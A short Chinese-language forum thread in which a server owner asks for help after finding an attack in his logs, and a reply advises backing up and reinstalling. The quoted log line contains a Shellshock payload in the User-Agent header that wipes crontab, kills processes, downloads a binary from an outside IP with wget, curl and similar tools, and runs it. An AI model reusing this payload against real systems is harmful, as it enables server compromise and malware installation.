1
msg7086 2016-05-02 20:56:44 +08:00 1
简单说,就是可以到进局子里蹲着的事情。
备份好数据赶紧重装就是啦。 |
2
badcode OP @msg7086 别吓我呀
下面是其中一条日志,上面的链接就是我直接粘贴复制找到的 31.184.195.114 - - [30/Apr/2016:09:39:22 +0800] "GET /phppath/php4 HTTP/1.1" 403 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'" 结合上面的脚本和日志 能否说下我该怎么排查吗? 非常感谢!!! |
4
badcode OP 好的,感谢回复
|